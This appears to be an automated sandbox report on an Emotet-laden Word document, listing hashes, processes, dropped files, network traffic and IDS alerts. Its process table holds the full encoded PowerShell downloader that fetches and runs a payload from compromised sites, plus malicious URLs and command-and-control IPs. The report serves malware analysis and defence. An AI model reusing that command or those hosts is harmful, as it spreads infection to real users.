File name: | DOC_with_EMOTET-fc56bd56.doc--385179250.zip |
Full analysis: | https://app.any.run/tasks/3b0c7a35-ffef-454f-be06-663f45cf5df5 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | June 12, 2019, 09:30:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 52022BA0F1CADDB16AA0D7AEBAA0A700 |
SHA1: | 3AE869467BB28FB1222CC63B32A757370FC41102 |
SHA256: | 7AEB4B650FAC4A503099F32B54150DCA23640C2C0F3839EBF6D73CA271FB9250 |
SSDEEP: | 1536:SfVMmRB0JhxCbcVzVMjgP3c9IpP114+Q7WeZpE1BhCdj52z:St6JhGcZQgPhpPsL7bZgz |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | fc56bd56.doc.METADATA |
---|---|
ZipUncompressedSize: | 379 |
ZipCompressedSize: | 261 |
ZipCRC: | 0x876a1751 |
ZipModifyDate: | 2019:05:23 10:39:11 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0008 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1892 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\DOC_with_EMOTET-fc56bd56.doc--385179250.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb1892.36875\fc56bd56.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3512 | powershell -nop -e JAB2AGsATgBmAHEASgBqAEgAPQAnAGgAawBjAHAARABNAF8AJwA7ACQAawBrAEcAZgBWAEMAOAAgAD0AIAAnADkANgA1ACcAOwAkAHoARgBVAE4AUgAyAFEAPQAnAGwANgBSAGoANQBsADQATAAnADsAJABsAG8AbwBDAEQARgAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABrAGsARwBmAFYAQwA4ACsAJwAuAGUAeABlACcAOwAkAFoAaAA4AHcAWgA2ADQAUAA9ACcAUABWAEYAVQBJAHcAJwA7ACQAdAB3AEUATABqAGwAdAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAGAAVAAuAHcAZQBiAGMAbABJAGAARQBOAHQAOwAkAGQAQQBLAEsAdwB1AD0AJwBoAHQAdABwADoALwAvAHQAaABvAGEAdAByAGEAbgAuADAAMAAwAHcAZQBiAGgAbwBzAHQAYQBwAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADcAaAAyAHIAbgBiADMANQA0AC8AQABoAHQAdABwAHMAOgAvAC8AdAByAHUAbgBnAGEAbgBoADMANgA5AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4ADcAdQB0AHAAMQAzADgAOAAwAC8AQABoAHQAdABwADoALwAvAHIAYQBkAGEAcgB1AHQAYQBtAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHEAagByAHIAYwA4ADEALwBAAGgAdAB0AHAAOgAvAC8AdQBtAGEAcwBvAGEAbABtAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHQAawAyAHkAOAAvAEAAaAB0AHQAcAA6AC8ALwBhAGgAbQAtAHMAbwBsAHUAdABpAG8AbgBzAC4AbgBlAHQALwBjAHMAcwAvAGsANgA2ADkALwAnAC4AUwBwAGwASQBUACgAJwBAACcAKQA7ACQAegBOADEANQBQAEwAPQAnAFMAQQBpAEUATABCAHcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFQAYgBEADkATwBOAG4AagAgAGkAbgAgACQAZABBAEsASwB3AHUAKQB7AHQAcgB5AHsAJAB0AHcARQBMAGoAbAB0AC4ARABvAFcATgBMAE8AQQBEAEYASQBMAEUAKAAkAFQAYgBEADkATwBOAG4AagAsACAAJABsAG8AbwBDAEQARgAxACkAOwAkAHoAQQBSADYAVABZAD0AJwBMAG8AWAAxADkAYgBIACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAbABvAG8AQwBEAEYAMQApAC4ATABlAE4AZwB0AGgAIAAtAGcAZQAgADMANQAyADAANQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABsAG8AbwBDAEQARgAxACkAOwAkAEEASgBsAFIAdgBQAD0AJwB0AHIAMgAzAFEAagBGACcAOwBiAHIAZQBhAGsAOwAkAG8AaQBWAHIAMQBPAD0AJwBjAEwAcgBZAGsAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAByAHcAMgBpAHIAUABCAD0AJwBhADUAZgBXAFgAdwB1AHoAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1224 | "C:\Users\admin\965.exe" | C:\Users\admin\965.exe | — | powershell.exe |
User: admin Company: VMware, Inc. Integrity Level: MEDIUM Description: VMware Resolution Set Exit code: 0 Version: 9.6.2.31837 | ||||
2540 | --99474b6 | C:\Users\admin\965.exe | 965.exe | |
User: admin Company: VMware, Inc. Integrity Level: MEDIUM Description: VMware Resolution Set Exit code: 0 Version: 9.6.2.31837 | ||||
2196 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 965.exe | |
User: admin Company: VMware, Inc. Integrity Level: MEDIUM Description: VMware Resolution Set Exit code: 0 Version: 9.6.2.31837 | ||||
1572 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Company: VMware, Inc. Integrity Level: MEDIUM Description: VMware Resolution Set Version: 9.6.2.31837 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7061.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3512 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8YJH42ZIN3JL2T02N3QM.temp | — | |
MD5:— | SHA256:— | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:400EF6AEBBC3D9F9F3F3E6BB20974395 | SHA256:09779222D45527B132507AE7B9823F5D6EF8253F62C39DF77F0B47A230C68C72 | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE0B3A02.wmf | wmf | |
MD5:12E8D7AD5FCA488DC470583D6873B1F4 | SHA256:987B9C9BADEA588FAAF3E384EFC47D367F1F749EF428D9DDC01AA1A867FBE316 | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCB099E1.wmf | wmf | |
MD5:8CBA6FA6AC9823B8FB885382023F87C9 | SHA256:717F590F4F341316683DD93020B3FDC73AA28061359FCBB5052A2E9909205216 | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9E0BE1B.wmf | wmf | |
MD5:F737FC7D23C6C93D8DA85761646EAD96 | SHA256:26E744CB13DA5B47BA49ED533065EEE06E308BCE2B4A44B2C0BDDD6ACBA0B0DC | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8973FAC5.wmf | wmf | |
MD5:DDB953DADCFB7CC092C08199E6239D1A | SHA256:6B1B9E47BEBA7D8D737A29A0209CC54837950AD4987F3A7CF765232419FE73A9 | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:188FB830E0B567B17B048C3276A421FD | SHA256:7431260F8E5214B8506DD10495E26A9C45470CDE16755CB01B18A89576A6F404 | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87F358D4.wmf | wmf | |
MD5:63D724E2487BA9CEF594CDDA96BA8268 | SHA256:FA8775C5E8C82C194C39562C85EBF40DA7339311EFADF390248E48D6F5CBABE9 | |||
3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb1892.36875\~$56bd56.doc | pgc | |
MD5:4A77A8853301A41BA99D6EEA674FE6A4 | SHA256:55D717FFAF19CB621D1703EF9CCA5031C75DAB6A1A9BCBBEDBA452CC802F3C7F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1572 | soundser.exe | POST | — | 159.65.241.220:8080 | http://159.65.241.220:8080/arizona/window/ringin/merge/ | US | — | — | malicious |
3512 | powershell.exe | GET | 403 | 145.14.144.111:80 | http://thoatran.000webhostapp.com/wp-admin/7h2rnb354/ | US | html | 8.25 Kb | shared |
3512 | powershell.exe | GET | 200 | 103.20.190.48:80 | http://radarutama.com/wp-admin/qjrrc81/ | ID | executable | 106 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3512 | powershell.exe | 103.20.190.48:80 | radarutama.com | ARDH GLOBAL INDONESIA, PT | ID | suspicious |
3512 | powershell.exe | 145.14.144.111:80 | thoatran.000webhostapp.com | Hostinger International Limited | US | shared |
1572 | soundser.exe | 159.65.241.220:8080 | — | — | US | malicious |
3512 | powershell.exe | 42.112.30.99:443 | trunganh369.com | The Corporation for Financing & Promoting Technology | VN | unknown |
1572 | soundser.exe | 80.86.92.114:7080 | — | Host Europe GmbH | DE | malicious |
Domain | IP | Reputation |
---|---|---|
thoatran.000webhostapp.com |
| shared |
trunganh369.com |
| unknown |
radarutama.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
3512 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3512 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3512 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3512 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1572 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 4 |
1572 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 22 |